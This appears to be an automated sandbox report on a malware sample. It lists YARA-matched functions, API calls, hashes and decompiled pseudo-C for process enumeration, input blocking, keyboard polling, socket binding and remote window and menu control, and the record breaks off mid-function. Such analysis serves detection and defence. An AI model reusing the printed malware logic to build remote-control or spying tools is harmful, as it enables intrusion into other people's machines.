                                                                                      • Part of subcall function 04EBAE50: AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 04EBAEE1
                                                                                      • Part of subcall function 04EBAE50: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04EBAEF2
                                                                                      • Part of subcall function 04EBAE50: FreeSid.ADVAPI32(00000000), ref: 04EBAF0B
                                                                                      • Part of subcall function 04EBAE50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04EBAF1B
                                                                                      • Part of subcall function 04EBAE50: HeapFree.KERNEL32(00000000), ref: 04EBAF22
                                                                                    • CreateFileMappingW.KERNEL32(000000FF,0000000C,00000004,00000000,00000D18,_kasssperskdy,04EBB5ED,74E06620), ref: 04EBB58C
                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04EBB5A4
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04EBB5CA
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBB5D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$FreeInitializeProcess$DescriptorFileSecurity$AccessAllocAllocateAllowedCreateDaclLengthMappingView
                                                                                    • String ID: _kasssperskdy
                                                                                    • API String ID: 2879929819-1033421605
                                                                                    • Opcode ID: 97e77fad5432e233fabbfdb75fbbb4eab18214565a489b8d94643cc70ef0f647
                                                                                    • Instruction ID: 732309b2a15a70cc28cc46a6698c8477006eff2195b99f82e233676b2596aab2
                                                                                    • Opcode Fuzzy Hash: 97e77fad5432e233fabbfdb75fbbb4eab18214565a489b8d94643cc70ef0f647
                                                                                    • Instruction Fuzzy Hash: F61182B0E40309AEEB10DFA59C06BEF7BBCEB48705F145115EA41F6280DA75A8008BB6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC1D00, Relevance: 7.6, APIs: 5, Instructions: 100keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BlockInput$EventExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 2024910948-0
                                                                                    • Opcode ID: ab1720698474fd5fd86831dfe18a76814d1cc38865cc678e510d2adfff4135a8
                                                                                    • Instruction ID: ded6e6b08a47662f5766a29a006478b13137811f5e62089f388ad4721b417fba
                                                                                    • Opcode Fuzzy Hash: ab1720698474fd5fd86831dfe18a76814d1cc38865cc678e510d2adfff4135a8
                                                                                    • Instruction Fuzzy Hash: F521BA772081449FD7009FA6F884E6EFB69FBE42367048267F648C9502C627E535DB74
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECD7B0, Relevance: 7.6, APIs: 5, Instructions: 95networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • htons.WS2_32(?), ref: 04ECD81E
                                                                                    • bind.WS2_32(?,00000002,0000001C), ref: 04ECD842
                                                                                    • bind.WS2_32(?,?,00000010), ref: 04ECD882
                                                                                    • InterlockedIncrement.KERNEL32(04F06B58), ref: 04ECD8AC
                                                                                    • InterlockedIncrement.KERNEL32(04F06B58), ref: 04ECD8B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: IncrementInterlockedbind$htons
                                                                                    • String ID:
                                                                                    • API String ID: 1901664375-0
                                                                                    • Opcode ID: 11d61a38bf5bd3d333f534705ff4016c29778c4bf68af9f89f327fddd0691701
                                                                                    • Instruction ID: af08c0dec7f2312ae99135ecdf198421a6d8490c352a402b3e96abfb5b85ae2c
                                                                                    • Opcode Fuzzy Hash: 11d61a38bf5bd3d333f534705ff4016c29778c4bf68af9f89f327fddd0691701
                                                                                    • Instruction Fuzzy Hash: 49319072E00118DBDB14EF68ED41AFEB3A5FF94324F00526AEC1597180DB71AD92DB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBB820, Relevance: 7.6, APIs: 5, Instructions: 54keyboardsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: State$Async$Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 1722988271-0
                                                                                    • Opcode ID: 6ab14b8ed99628770cadc1e17ad71cd8d184816cec54782ca02c7c02c9393d36
                                                                                    • Instruction ID: c98bb0a36e5a158520a265c702e739eefb6e1ecf63c247c387a13bcb8264d2c3
                                                                                    • Opcode Fuzzy Hash: 6ab14b8ed99628770cadc1e17ad71cd8d184816cec54782ca02c7c02c9393d36
                                                                                    • Instruction Fuzzy Hash: 88112B72A403109FDA345764CC54FF3B394EF81B89B092418ECDA175D0DB14BD01D6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB57F0, Relevance: 6.1, APIs: 4, Instructions: 94fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04EB5844
                                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 04EB58AA
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 04EB58CA
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04EB58DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileFind$CreateFirstHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3283578348-0
                                                                                    • Opcode ID: 779f2d1324e9d0b51d4218a3c5eea3b7a7b704f7df97cb86a5476a5652a6a2af
                                                                                    • Instruction ID: e3fc9962ea1cd7975eb8fb560c807a5b00b3311015e5b3b85541b12c408c49a0
                                                                                    • Opcode Fuzzy Hash: 779f2d1324e9d0b51d4218a3c5eea3b7a7b704f7df97cb86a5476a5652a6a2af
                                                                                    • Instruction Fuzzy Hash: 7731A531E00214FBDB249FA89C497EAB775EB45328F145AA9E8D5A7180D770BD40CBD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECDFF0, Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$recv
                                                                                    • String ID:
                                                                                    • API String ID: 316788870-0
                                                                                    • Opcode ID: 70bb610363a8535d0413c4c688e07248d541a925796f9d05d94d26bfd62d9df3
                                                                                    • Instruction ID: d297bcd54cbd101d3be65bf6c685cc1bf141f11a93c2c749a2e315415d23b186
                                                                                    • Opcode Fuzzy Hash: 70bb610363a8535d0413c4c688e07248d541a925796f9d05d94d26bfd62d9df3
                                                                                    • Instruction Fuzzy Hash: 1621D671200700CFE7309F6CD589796B7F5EB40329F10993DE546C6A90CBBAF9869B80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED669F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EB16B0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,04ED66CE,?,?,04F00654,?,?,?,?,04EB2EDF,?,?), ref: 04EB16B3
                                                                                      • Part of subcall function 04EB16B0: GetLastError.KERNEL32(?,?,?,04EB2EDF,?,?), ref: 04EB16BD
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,04F00654,?,?,?,?,04EB2EDF,?,?), ref: 04ED66D2
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,04EB2EDF,?,?), ref: 04ED66E1
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 04ED66DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 450123788-631824599
                                                                                    • Opcode ID: 2228e75d65392fd29407060f04cfc0ba0676c9311d9c6a728ef32093d89e5c5c
                                                                                    • Instruction ID: 7bc6811e2f9f0d94666d35b10c30f5a56ede6ba109db9d19bbdf7d794ab369a8
                                                                                    • Opcode Fuzzy Hash: 2228e75d65392fd29407060f04cfc0ba0676c9311d9c6a728ef32093d89e5c5c
                                                                                    • Instruction Fuzzy Hash: 51E06DB0200740AFE7609F79E814247BBE4AF40358F049D1CD895C2240EBB8F888CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EDE94C, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04EDEA44
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04EDEA4E
                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 04EDEA5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: e1de71fbde3ab6277719facf060bc93e66b9463d34707e4a174e66397b837c88
                                                                                    • Instruction ID: dadf06175ae048863bf7ab7ad3aaa8dac577d570d05b5f6799c42b02a94bba6b
                                                                                    • Opcode Fuzzy Hash: e1de71fbde3ab6277719facf060bc93e66b9463d34707e4a174e66397b837c88
                                                                                    • Instruction Fuzzy Hash: DD31C77490122DABDB21DF68D88879DBBB8FF48315F5052EAE80CA7250E7749F858F44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EDEFAF, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000,00000001,04ED5E8A,04F00530,0000000C,04ED5D33,?), ref: 04EDEFD0
                                                                                    • TerminateProcess.KERNEL32(00000000,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000,00000001,04ED5E8A,04F00530,0000000C,04ED5D33,?), ref: 04EDEFD7
                                                                                    • ExitProcess.KERNEL32 ref: 04EDEFE9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: e05fc4b429c1f592bad350dab9c60ac3748c30f42076e9847a63859dd87a5351
                                                                                    • Instruction ID: 39ceed1f8269a3b79c21dbefde23a6fe72d2f03bf039d8730b55d489f3c7e358
                                                                                    • Opcode Fuzzy Hash: e05fc4b429c1f592bad350dab9c60ac3748c30f42076e9847a63859dd87a5351
                                                                                    • Instruction Fuzzy Hash: BCE0B631000608ABDF156F55D908A583FAAEB8468AB005124FD458B121CB3AED92DA40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D772D8, Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415882138.0000000004D77000.00000040.00000001.sdmp, Offset: 04D77000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .$L
                                                                                    • API String ID: 0-1125146341
                                                                                    • Opcode ID: d805489d28d633f0ce7dcda1eeac1db81b5e640f075861075353b7ec4d023812
                                                                                    • Instruction ID: 82892334d770ea6a3d17faaf3ab81e9d02f214750292d04d4d68e00e7eaebe9d
                                                                                    • Opcode Fuzzy Hash: d805489d28d633f0ce7dcda1eeac1db81b5e640f075861075353b7ec4d023812
                                                                                    • Instruction Fuzzy Hash: 7C519376E002699FCB10CF98C880AADBBF5FF89704F1545BAD95597311E770B942CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC4BC0, Relevance: 58.1, APIs: 31, Strings: 2, Instructions: 337stringlibraryprocessCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 88%
                                                                                    			E04EC4BC0(void* __ebx, void* __edx, long __edi, void* __esi) {
				signed int _v8;
				signed int _v16;
				char _v532;
				char _v540;
				short _v548;
				char _v1052;
				char _v1060;
				short _v1068;
				char _v1572;
				char _v1580;
				short _v1588;
				char _v2092;
				char _v2100;
				short _v2108;
				char _v2612;
				char _v2620;
				short _v2628;
				intOrPtr _v2636;
				intOrPtr _v2640;
				int _v2644;
				intOrPtr _v2648;
				char _v2652;
				void* _v2656;
				signed int _v2660;
				intOrPtr _v2668;
				char _v2676;
				short _v3200;
				intOrPtr _v3212;
				intOrPtr _v3216;
				long _v3220;
				char _v3224;
				void* _v3228;
				void* _v3232;
				void* _v3236;
				void* _v3244;
				int _v3248;
				long _v3252;
				void* _v3256;
				void* _v3260;
				long _v3264;
				signed int _t135;
				struct tagPROCESSENTRY32W* _t152;
				long _t159;
				_Unknown_base(*)()* _t169;
				void* _t171;
				int _t175;
				int _t177;
				int _t179;
				int _t183;
				int _t185;
				signed int _t207;
				void* _t252;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t264;
				long _t282;
				long _t283;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t291;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t297;
				void* _t299;
				void* _t302;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				void* _t314;
				void* _t315;

				_t272 = __edi;
				_t268 = __edx;
				_t305 = (_t303 & 0xfffffff8) - 0xcac;
				_t135 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t135 ^ _t305;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				E04EDDAD0(__edi,  &_v3220, 0, 0x22c);
				E04EDDAD0(_t272,  &_v2612, 0, 0x208);
				E04EDDAD0(_t272,  &_v2092, 0, 0x208);
				E04EDDAD0(_t272,  &_v1572, 0, 0x208);
				E04EDDAD0(_t272,  &_v1052, 0, 0x208);
				E04EDDAD0(_t272,  &_v532, 0, 0x208);
				_t311 = _t305 + 0x48;
				_v2640 = 7;
				_v2644 = 0;
				_v2660 = 0;
				_t252 = CreateToolhelp32Snapshot(2, 0);
				_v3228 = _t252;
				if(_t252 != 0xffffffff) {
					_v3224 = 0x22c;
					_t299 = LocalAlloc(0x40, 0x19000);
					_t272 = 1;
					_t152 =  &_v3224;
					_v3248 = _t299;
					 *_t299 = 0x80;
					_v3252 = 1;
					Process32FirstW(_t252, _t152);
					if(_t152 != 0) {
						_t302 = lstrlenW;
						do {
							_t254 = OpenProcess(0x410, 0, _v3220);
							_t159 = _v3220;
							_v3236 = _t254;
							if(_t159 != 0 && _t159 != 4 && _t159 != 8) {
								_push(_t257);
								E04EC4560(_t254, _t254,  &_v2620, _t272, _t302);
								E04EC5D90(_t254,  &_v2620,  &_v1580, _t272, _t302,  &_v1060,  &_v540);
								_t264 = _t254;
								E04EC43E0(_t264,  &_v2100, _t272, _t302);
								_t314 = _t311 + 0xc;
								_v3244 = 0;
								_t169 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
								if(_t169 != 0) {
									_t264 =  &_v3244;
									 *_t169(_t254, _t264);
								}
								_v3248 = 0;
								__imp__ProcessIdToSessionId(_v3220,  &_v3248);
								_t268 = _v3228;
								_push(_t264);
								_t171 = E04EB6060(_t254,  &_v2652, _v3228, _t272, _t302);
								_t315 = _t314 + 4;
								E04EC5330(_t254,  &_v2676, _t171);
								_t173 = _v2636;
								if(_v2636 >= 8) {
									E04EB3540(_t254, _t268, _t272, _v2652, _t173 + 1);
								}
								_t175 = lstrlenW( &_v3200);
								_t177 = lstrlenW( &_v548);
								_t179 = lstrlenW( &_v1068);
								_v3248 = _t175 + _t177 + _t179 + lstrlenW( &_v1588);
								_t183 = lstrlenW( &_v2108);
								_t185 = lstrlenW( &_v2628);
								_t256 = _v3260;
								_t282 = _v3264 + 0x22 + _t185 + _v2660 + _t183 + _v3248 + _t185 + _v2660 + _t183 + _v3248;
								if(LocalSize(_t256) < _t282) {
									_t256 = LocalReAlloc(_t256, _t282, 0x42);
									_v3260 = _t256;
								}
								_t283 = _v3264;
								 *(_t283 + _t256) = _v3228;
								 *((intOrPtr*)(_t283 + _t256 + 4)) = _v3212;
								 *((intOrPtr*)(_t283 + _t256 + 8)) = _v3216;
								_t284 = _t283 + 0xc;
								E04EDDC90(_t284 + _t256,  &_v3200, 2 + lstrlenW( &_v3200) * 2);
								_t286 = _t284 + lstrlenW( &_v3200) * 2 + 2;
								E04EDDC90(_t286 + _t256,  &_v2628, 2 + lstrlenW( &_v2628) * 2);
								_t207 = lstrlenW( &_v2628);
								_t257 =  >=  ? _v2676 :  &_v2676;
								_t288 = _t286 + _t207 * 2 + 2;
								E04EDDC90(_t288 + _t256, _t257, 2 + _v2660 * 2);
								_t290 = _t288 + _v2660 * 2 + 2;
								E04EDDC90(_t290 + _t256,  &_v2108, 2 + lstrlenW( &_v2108) * 2);
								_t291 = _t290 + lstrlenW( &_v2108) * 2;
								 *((intOrPtr*)(_t291 + _t256 + 2)) = _v3256;
								_t292 = _t291 + 6;
								E04EDDC90(_t292 + _t256,  &_v1588, 2 + lstrlenW( &_v1588) * 2);
								_t294 = _t292 + lstrlenW( &_v1588) * 2 + 2;
								E04EDDC90(_t294 + _t256,  &_v1068, 2 + lstrlenW( &_v1068) * 2);
								_t296 = _t294 + lstrlenW( &_v1068) * 2 + 2;
								E04EDDC90(_t296 + _t256,  &_v548, 2 + lstrlenW( &_v548) * 2);
								_t311 = _t315 + 0x54;
								_t297 = _t296 + lstrlenW( &_v548) * 2;
								 *(_t297 + _t256 + 2) = _v3252;
								_t272 = _t297 + 6;
								_t254 = _v3244;
								_v3264 = _t272;
							}
							CloseHandle(_t254);
							_t252 = _v3232;
						} while (Process32NextW(_t252,  &_v3228) != 0);
						_t299 = _v3256;
					}
					LocalReAlloc(_t299, _t272, 0x42);
					CloseHandle(_t252);
				} else {
				}
				_t258 = _v2648;
				if(_v2648 >= 8) {
					E04EB3540(_t252, _t268, _t272, _v2668, _t258 + 1);
				}
				return E04ED572E(_v16 ^ _t311);
			}













































































                                                                                    0x04ec4bc0
                                                                                    0x04ec4bc0
                                                                                    0x04ec4bc6
                                                                                    0x04ec4bcc
                                                                                    0x04ec4bd3
                                                                                    0x04ec4bda
                                                                                    0x04ec4bdb
                                                                                    0x04ec4bdc
                                                                                    0x04ec4be9
                                                                                    0x04ec4c00
                                                                                    0x04ec4c17
                                                                                    0x04ec4c2e
                                                                                    0x04ec4c45
                                                                                    0x04ec4c5c
                                                                                    0x04ec4c61
                                                                                    0x04ec4c64
                                                                                    0x04ec4c71
                                                                                    0x04ec4c7c
                                                                                    0x04ec4c8d
                                                                                    0x04ec4c8f
                                                                                    0x04ec4c96
                                                                                    0x04ec4ca6
                                                                                    0x04ec4cb4
                                                                                    0x04ec4cb6
                                                                                    0x04ec4cbb
                                                                                    0x04ec4cbf
                                                                                    0x04ec4cc5
                                                                                    0x04ec4cc8
                                                                                    0x04ec4ccc
                                                                                    0x04ec4cd4
                                                                                    0x04ec4cda
                                                                                    0x04ec4ce0
                                                                                    0x04ec4cf1
                                                                                    0x04ec4cf3
                                                                                    0x04ec4cf7
                                                                                    0x04ec4cfd
                                                                                    0x04ec4d15
                                                                                    0x04ec4d1f
                                                                                    0x04ec4d45
                                                                                    0x04ec4d54
                                                                                    0x04ec4d56
                                                                                    0x04ec4d5b
                                                                                    0x04ec4d5e
                                                                                    0x04ec4d77
                                                                                    0x04ec4d7f
                                                                                    0x04ec4d81
                                                                                    0x04ec4d87
                                                                                    0x04ec4d87
                                                                                    0x04ec4d8d
                                                                                    0x04ec4d9a
                                                                                    0x04ec4da0
                                                                                    0x04ec4da4
                                                                                    0x04ec4dac
                                                                                    0x04ec4db1
                                                                                    0x04ec4dbc
                                                                                    0x04ec4dc1
                                                                                    0x04ec4dcb
                                                                                    0x04ec4dd6
                                                                                    0x04ec4dd6
                                                                                    0x04ec4de7
                                                                                    0x04ec4df3
                                                                                    0x04ec4dff
                                                                                    0x04ec4e17
                                                                                    0x04ec4e1b
                                                                                    0x04ec4e28
                                                                                    0x04ec4e2e
                                                                                    0x04ec4e3e
                                                                                    0x04ec4e48
                                                                                    0x04ec4e54
                                                                                    0x04ec4e56
                                                                                    0x04ec4e56
                                                                                    0x04ec4e5a
                                                                                    0x04ec4e62
                                                                                    0x04ec4e69
                                                                                    0x04ec4e71
                                                                                    0x04ec4e7a
                                                                                    0x04ec4e90
                                                                                    0x04ec4eaa
                                                                                    0x04ec4ec3
                                                                                    0x04ec4ed3
                                                                                    0x04ec4ee4
                                                                                    0x04ec4ef6
                                                                                    0x04ec4f06
                                                                                    0x04ec4f20
                                                                                    0x04ec4f39
                                                                                    0x04ec4f4b
                                                                                    0x04ec4f52
                                                                                    0x04ec4f56
                                                                                    0x04ec4f77
                                                                                    0x04ec4f94
                                                                                    0x04ec4fad
                                                                                    0x04ec4fca
                                                                                    0x04ec4fe3
                                                                                    0x04ec4fe8
                                                                                    0x04ec4ff5
                                                                                    0x04ec4ffc
                                                                                    0x04ec5000
                                                                                    0x04ec5003
                                                                                    0x04ec5007
                                                                                    0x04ec5007
                                                                                    0x04ec500c
                                                                                    0x04ec5012
                                                                                    0x04ec5022
                                                                                    0x04ec502a
                                                                                    0x04ec502a
                                                                                    0x04ec5032
                                                                                    0x04ec503b
                                                                                    0x04ec4c98
                                                                                    0x04ec4c98
                                                                                    0x04ec5041
                                                                                    0x04ec504b
                                                                                    0x04ec5056
                                                                                    0x04ec5056
                                                                                    0x04ec5071

                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 04EC4C87
                                                                                    • LocalAlloc.KERNEL32(00000040,00019000), ref: 04EC4CAE
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 04EC4CCC
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,0000022C), ref: 04EC4CEB
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EC4D70
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC4D77
                                                                                    • ProcessIdToSessionId.KERNEL32(?,?), ref: 04EC4D9A
                                                                                    • lstrlenW.KERNEL32(?,00000000), ref: 04EC4DE7
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4DF3
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4DFF
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4E0B
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EC4E1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Process$AddressAllocCreateFirstLibraryLoadLocalOpenProcProcess32SessionSnapshotToolhelp32
                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                    • API String ID: 1515997778-3024904723
                                                                                    • Opcode ID: e58a58765657c12f7077a0605f7b4158bc4c1a0c15abd3931df6513e294c4a68
                                                                                    • Instruction ID: 3ff6b37f7126b93490503b6236085d465d51f3832278a0c1bd72875cef1304e1
                                                                                    • Opcode Fuzzy Hash: e58a58765657c12f7077a0605f7b4158bc4c1a0c15abd3931df6513e294c4a68
                                                                                    • Instruction Fuzzy Hash: F5D139B2504345ABD720DB64DC89EDBB7ECEBC4304F404A2AE989D7150EB74B619CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6FC0, Relevance: 58.1, APIs: 30, Strings: 3, Instructions: 323windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 80%
                                                                                    			E04EB6FC0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, long _a12) {
				signed int _v8;
				char _v276;
				struct _WINDOWPLACEMENT _v320;
				struct tagRECT _v336;
				struct HWND__* _v340;
				struct tagPOINT _v348;
				struct tagPOINT _v356;
				int _v360;
				signed int _t87;
				unsigned int _t91;
				signed short _t93;
				intOrPtr _t95;
				struct HWND__* _t106;
				signed int _t110;
				int _t123;
				long _t124;
				struct HMENU__* _t126;
				void* _t132;
				signed short _t139;
				struct HWND__* _t142;
				void* _t145;
				struct tagPOINT _t147;
				int _t151;
				int _t154;
				intOrPtr _t157;
				long _t158;
				int _t163;
				struct HMENU__* _t164;
				signed short _t166;
				struct HWND__* _t167;
				int _t171;
				struct HWND__* _t172;
				int _t173;
				signed int _t176;
				signed int _t178;

				_t178 = (_t176 & 0xfffffff8) - 0x164;
				_t87 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t87 ^ _t178;
				_v360 = 0;
				_t157 = __ecx;
				_v348.y = __ecx;
				if(_a4 + 0xffffff00 > 2) {
					_t91 = _a12;
					_t166 =  *(__ecx + 0x78);
					_t147 = _t91;
					_t93 = _t91 >> 0x10;
					_push(_t93);
					_v360 = 1;
					_v356.x = _t147;
					_v356.y = _t93;
					_v348.x =  *(__ecx + 0x74);
					 *(__ecx + 0x74) = _t147;
					 *(__ecx + 0x78) = _t93;
					_t142 = WindowFromPoint(_t147);
					_t95 = _a4;
					if(_t95 != 0x202) {
						if(_t95 != 0x201) {
							if(_t95 != 0x200) {
								goto L2;
							}
							_t106 =  *(_t157 + 0x7c);
							_v340 = _t106;
							if(_t106 == 0) {
								goto L2;
							}
							_t145 = _v348 - _v356.x;
							_v360 = _t166 - _v356.y;
							GetWindowRect(_t106,  &_v336);
							_t151 = _v336.left;
							_t171 = _v336.right - _t151;
							_t154 = _v336.top;
							_t110 =  *((intOrPtr*)(_v348.y + 0x80)) + 0xfffffffe;
							_t163 = _v336.bottom - _t154;
							if(_t110 > 0xf) {
								L42:
								MoveWindow(_v340, _t151, _t154, _t171, _t163, 0);
								goto L11;
							}
							switch( *((intOrPtr*)(_t110 * 4 +  &M04EB7404))) {
								case 0:
									MoveWindow(_v340, _t151 - _t145, _t154 - _v360, _t171, _t163, 0);
									goto L11;
								case 1:
									goto L42;
								case 2:
									L37:
									__esi = __ebx + __esi;
									__ecx = __ecx - __ebx;
									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
									goto L11;
								case 3:
									L41:
									__esi = __esi - __ebx;
									goto L42;
								case 4:
									__edi = __edi + _v360;
									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
									goto L11;
								case 5:
									__edx = __edx - _v360;
									__edi = __edi + _v360;
									goto L37;
								case 6:
									__edx = __edx - _v360;
									__edi = __edi + _v360;
									goto L41;
								case 7:
									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
									goto L11;
								case 8:
									__edi = __edi - _v360;
									__esi = __ebx + __esi;
									__ecx = __ecx - __ebx;
									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
									goto L11;
								case 9:
									__edi = __edi - _v360;
									goto L41;
							}
						}
						 *(_t157 + 0x7c) = 0;
						_t172 = FindWindowA("Button", 0);
						GetWindowRect(_t172,  &_v336);
						_push(_v356.y);
						if(PtInRect( &_v336, _v356.x) == 0) {
							E04EDDAD0(_t157,  &_v276, 0, 0x104);
							_t178 = _t178 + 0xc;
							RealGetWindowClassA(_t142,  &_v276, 0x104);
							_t123 = lstrcmpA( &_v276, "#32768");
							if(_t123 != 0) {
								_t124 = SendMessageW(_t142, 0x84, 0, _a12);
								 *(_t157 + 0x80) = _t124;
								if(_t124 == 2 || _t124 + 0xfffffff6 <= 7) {
									 *(_t157 + 0x7c) = _t142;
								}
								goto L2;
							}
							_t126 = SendMessageW(_t142, 0x1e1, _t123, _t123);
							_push(_v356.y);
							_t164 = _t126;
							_t173 = MenuItemFromPoint(0, _t164, _v356.x);
							GetMenuItemID(_t164, _t173);
							PostMessageW(_t142, 0x1e5, _t173, 0);
							PostMessageW(_t142, 0x100, 0xd, 0);
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0xf5);
						_push(_t172);
						goto L10;
					}
					 *(_t157 + 0x7c) = 0;
					_t158 = _a12;
